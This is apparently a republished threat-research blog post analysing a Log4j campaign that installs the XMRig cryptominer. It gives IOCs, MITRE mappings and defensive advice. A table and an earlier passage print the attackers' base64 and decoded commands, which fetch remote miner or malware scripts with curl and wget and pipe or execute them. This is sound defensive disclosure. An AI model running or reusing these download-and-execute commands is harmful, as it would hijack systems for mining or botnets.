New Threat Detected: Inside Our Discovery of the Log4j Campaign and Its XMRig Malware
Published 06/18/2024
Originally published by Uptycs.
Written by Shilpesh Trivedi and Nisarga C M.
The Uptycs Threat Research Team has uncovered a large-scale, ongoing operation within the Log4j campaign. Initially detected within our honeypot collection, upon discovery, the team promptly initiated an in-depth analysis to delve into the complexities of this dynamic campaign.
The threat research team has ascertained that this campaign is active, with over 1700+ dedicated IPs implicated in its operations.
Upon analysis, it has been determined that the ultimate objective of the campaign is to deploy an XMRig cryptominer malware onto the targeted systems.
CVE-2021-44228
In December 2021, a Remote Code Execution [RCE] vulnerability [CVE-2021-44228] within Apache Log4j 2 was detected being actively exploited in the wild environment.
Furthermore Uptycs reported and offered insights into the log4j vulnerability for detection. This includes identifying activities through behavioral threat detection and utilizing YARA process memory and file scan components.
Moreover, several proof-of-concept (PoC) codes were disclosed, and subsequent investigation indicated that exploiting the vulnerability facilitated attacks.
In the scrutinized campaign, the infection sequence initiates with the transmission of a meticulously crafted HTTP request by an attacker to a designated system employing Log4j. Subsequently, Log4j generates a log entry incorporating the exploit string designated within the HTTP user-agent header.
The exploit string triggers Log4j to initiate a network request to the server controlled by the attacker, such as LDAP or HTTP servers, utilizing JNDI, a plugin among several lookup mechanisms supported by Log4j.
The JNDI plugin is particularly useful to attackers because it allows them not only to fetch the values of environment variables in the target system but also to freely define the URL and protocol resource for the JNDI network connection.
By submitting a specially crafted request to a vulnerable system, the attackers can leverage the system's configuration variability to command its retrieval and subsequent execution of their malicious payload.
log4j impact history
As a result of the remarkable discovery of this exploit, numerous campaign activities have been initiated, and they continue to unfold.
The main objectives for exploiting this vulnerability appears to be:
- Attain access to the vulnerable server
- Deploy malware
- Extract data
It has been observed that various threat actors such as Lazarus, APT28, APT35, and DEV-0401 have begun exploiting these vulnerabilities and deploy numerous malware strains.
For instance, in Windows environments, they have targeted systems with malware like NineRAT, DLRAT, BottomLoader, among others. Similarly, in Linux environments, malware such as Kinsing, NightSky, Lockbit, Coinminer, Mirai, Tsunami, Mushtik botnet, and more have been deployed.
This extensive fallout resulting from the log4j vulnerabilities has had a significant impact on the software industry, with thousands of Java packages being severely affected by the disclosure.
Technical campaign analysis
During routine sandbox hunting analysis, the Uptycs Threat Research team uncovered evidence of an ongoing live campaign exploiting the Log4j vulnerability, which commenced in January 2024.
Given the multitude of striking activities observed within our honeypot during the ongoing campaign, the Uptycs Threat Research team has initiated an in-depth analysis to unveil comprehensive insights.
With the help of the below FoFA query, we were able to discover that around 1700+ IPs were being actively found on this campaign activity.
Figure 1 - FoFA Query
Surprisingly, almost all of these identified IPs were routed to the four hosted Command-and-control server servers.
Command-and-control analysis
The Uptycs Team uncovered the presence of four distinct sets of servers, each tasked with deciphering its activities and establishing communication with one of the compromised IPs implicated in this ongoing campaign, facilitating the distribution of XMRig cryptominers.
Below is an exemplar analysis of one of the Command-and-Control [C2] servers, meticulously detailing each sequential activity.
The first set of C2 IPs - 139[.]99[.]171[.]1 and 146[.]59[.]16[.]84 where both use the port number 3306 to perform an attack.
Base64 code has also been identified, as shown in below figure 2.
Upon decoding, it was discerned that subsequent to compromising a victim machine, it initiated contact with a URL to fetch a shell script for the deployment of the XMRig miner, or alternatively, in select instances, it disseminated Mirai or Gafgyt malware.
killall -9 paraiso.x86; killall -9 xmrig; curl -s -L http[:]//download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner[.]sh | LC_ALL=en_US.UTF-8 bash -s 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGNì=»
Additionally, we were able to discover another encoded base64 format within the above decoded format, but unfortunately could not find its root cause action.
The below table shows the complete details of identified command-and-control servers, with respective payload content on encoded code to the final URL, which drops the XMRig cryptominer malware.
IP/URL |
Base64 Command |
Decode Command |
URL |
139[.]99[.]171[.]1[:]3306 146[.]59[.]16[.]84[:]3306 |
a2lsbGFsbCAtOSBw YXJhaXNvLng4Njsg a2lsbGFsbCAtOSB4 bXJpZzsgY3VybCAt cyAtTCBodHRwOi8v ZG93bmxvYWQuYz Nwb29sLm9yZy94b XJpZ19zZXR1cC9y YXcvbWFzdGVyL3 NldHVwX2MzcG9v bF9taW5lci5zaCB 8IExDX0FMTD1lbl 9VUy5VVEYtOCB iYXNoIC1zIDQ4N nhxdzd5c1hkS3c3 UmtWelQ1dGRTa UR0RTZzb3hVZF lhR2FHRTFHb2F DZHZCRjdyVmc1 b01YTDlwRngzc kIxV1VDWnJKd mQ2QUhNRldpc GVZdDVlRk5VeDl wbUdO%7D%27\) |
killall -9 paraiso.x86; killall -9 xmrig; curl -s -L http[:]//download.c3pool [.]org/xmrig_setup/raw/master/setup _c3pool_miner[.]sh | LC_ALL=en_US.UTF-8 bash -s 486xqw7ysXdKw7RkVzT5tdSiDt E6soxUdYaGaGE1GoaCdvBF7r Vg5oMXL9pFx3rB1WUCZrJvd6 AHMFWipeYt5eFNUx9pmGNì=» |
hxxp[:]//download[.] c3pool[.]org/xmrig_setup /raw/master /setup_c3pool_miner[.]sh |
hxxps[://]9a7d-183-82-25-4.ngrok[.]io hxxps[:]//200[.]150[.]202 [.]54[:]1389 |
Y2QgL3RtcCB8fC BjZCAvdmFyL3J1 biB8fCBjZCAvbW5 0IHx8IGNkIC9yb2 90IHx8IGNkIC87I HdnZXQgaHR0cD ovLzIwMC4xNTAu MjA1LjY1LzhVc0E uc2g7IGN1cmwgL U8gaHR0cDovLzI wMC4xNTAuMjA1 LjY1LzhVc0Euc2g 7IGNobW9kIDc3N yA4VXNBLnNoOyB zaCA4VXNBLnNo |
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http[:]//200.150.205.65/8UsA.sh; curl -O http[:]//200.150.205.65 /8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh |
hxxp[:]//200[.]150[.]205 [.]65/8UsA[.]sh |
95[.]214[.]27[.]7[:]3472 |
d2dldCAtTyAvdG1 wL2N1c3RvbXg4N iBodHRwOi8vOT UuMjE0LjI3LjcvY mFzZS9jdXN0b214 ODYgOyBjdXJsI C1vIC90bXAvY3Vzd G9teDg2IGh0dHA6L y85NS4yMTQuMjcu Ny9iYXNlL2N1c3Rvb Xg4NiA7IGNobW9k IDc3MCAvdG1wL2N 1c3RvbXg4NiA7IGN obW9kIDc3NyAvdG 1wL2N1c3RvbXg4 NiA7IC90bXAvY3V zdG9teDg2IG5ldyA 7IHJtIC1yZiAvdG1 wL2N1c3RvbXg4Ng= |
wget -O /tmp/customx86 http[:]//95.214.27.7/base/customx86 ; curl -o /tmp/customx86 http[:]//95.214.27.7/base/customx86 ; chmod 770 /tmp/customx86 ; chmod 777 /tmp/customx86 ; /tmp/customx86 new ; rm -rf /tmp/customx86 |
hxxp://95[.]214[.]27[.]7 /base/customx86 |
Cdn[.]x4b[.]lol[:]3306 |
Y3VybCAtcyAtTCBod HRwczovL3Jhdy5na XRodWJ1c2VyY29u dGVudC5jb20vQzN Qb29sL3htcmlnX3N ldHVwL21hc3Rlci9z ZXR1cF9jM3Bvb2xf bWluZXIuc2ggfCBiY XNoIC1zIDQ4Nnhx dzd5c1hkS3c3Umt WelQ1dGRTaUR0 RTZzb3hVZFlhR2F HRTFHb2FDZHZC RjdyVmc1b01YT DlwRngzckIxV1VD WnJKdmQ2QUhN RldpcGVZdDVlR k5VeDlwbUdO |
curl -s -L https[:]//raw [.]githubusercontent[.]com/C3Pool /xmrig_setup/master /setup_c3pool_miner.sh | bash -s 486xqw7ysXdKw7RkVzT5tdSiD tE6soxUdYaGaGE1GoaCdvBF7r Vg5oMXL9pFx3rB1WUCZrJvd6A HMFWipeYt5eFNUx9pmGN |
hxxps[:]//raw [.]githubusercontent[.]com /C3Pool/xmrig_setup /master/setup _c3pool_miner[.]sh |
Percentage of campaign organized by individual indicators
The below figure (3) shows the impact of each IP that has been mostly attributed to imply cryptominer payloads to infect the endpoints.
While "139[.]99[.]171[.]1" holds 60% of the campaign alone, the remaining 38% are owned by "146[.]59[.]16[.]84" and the remaining 0.97% are owned by additional IP/domain.
Figure 3 - Infection Ratio
Affected Country Hit Map
On performing thorough examination of the IP addresses associated with the campaign activity, the Uptycs Threat Research Team unveiled the geographical distribution of affected countries, with China occupying the foremost position, followed by Hong Kong, Netherlands, Japan, United States, Germany, South Africa, and Sweden.
Figure 4 - Affected Countries
Searching Query:
To detect this live ongoing campaign activity, users can refer to the below queries on the internet to check from FoFA and Censys threat-hunting platforms.
Mitre Techniques:
Tactics |
Techniques |
Initial Access |
|
Resource Development |
T1583 -Acquire Infrastructure |
Command-and-Control |
T1132 -Data Encoding |
Command-and-Control |
T1105 - Ingress Tool Transfer |
Impact |
T1574 - Resource Hijacking |
Indicators of Compromise:
Indicator Type | Indicators |
IP | 139[.]99[.]171[.]1 |
IP | 146[.]59[.]16[.]84 |
IP | 200[.]150[.]202[.]54 |
IP | 200[.]150[.]205[.]65 |
IP | 95[.]214[.]27[.]7 |
Domain | download[.]c3pool[.]org |
Domain | cdn[.]x4b[.]lol |
URL | hxxp[:]//download[.]c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner[.]sh |
URL | hxxp[:]//200[.]150[.]205[.]65/8UsA[.]sh |
URL | hxxp[:]//95[.]214[.]27[.]7/base/customx86 |
URL | hxxps[:]//raw[.]githubusercontent[.]com/C3Pool/xmrig_setup/master/setup_c3pool_miner[.]sh |
SHA256 | 6731b2b5441e4782b8ca3a373a610993c049860e5afa862b9950d58060b0dcfe |
SHA256 | 6c62a1b489409cb30e93bba0ee7042d780e22268f2e7a603fb39615aa5c19fab |
SHA256 | c3ab1f5e612afac2e6bcbec0f6b4316853e3168f274540d97701bd21564fec9d |
SHA256 | 21e45b71b4fa863a6402df03158229ce9ca13969eb240dc899b8ae28e43e82a6 |
Conclusion and precaution
To defend against the exploit of Log4j campaign attacks, it is always recommended to:
- Patch Management: Implement robust patch management processes to ensure that endpoints are promptly updated with the latest security patches and fixes for Log4j vulnerabilities. Monitor for any endpoints that are missing critical patches and prioritize their remediation.
- Network Traffic Monitoring: Monitor network traffic for signs of Log4j-related activity, such as requests to exploit known vulnerabilities or attempts to exfiltrate sensitive data.
- Incident Response Planning: Develop and regularly test incident response plans that outline the steps to take in the event of a Log4j-related security incident. Ensure that your EDR solutions are integrated with your incident response processes to enable rapid detection, containment, and remediation of threats.
- Continuous Monitoring: Implement continuous monitoring practices to maintain visibility into endpoint activity and detect any signs of compromise in real-time.
By leveraging such above few recommendations, organizations can enhance their ability to detect, respond to, and mitigate log4j-related threats effectively.
Further reading about CVE-2021-44228:
Log4j CVE-44228: Scanning a Million Hosts in under 30 Minutes
Log4j 2 CVE-2021-44228: Solution From a Software Architect Perspective
Related Articles:
A Vulnerability Management Crisis: The Issues with CVE
Published: 11/21/2024
The Lost Art of Visibility, in the World of Clouds
Published: 11/20/2024
When a Breach Occurs, Are We Ready to Minimize the Operational Effects
Published: 11/08/2024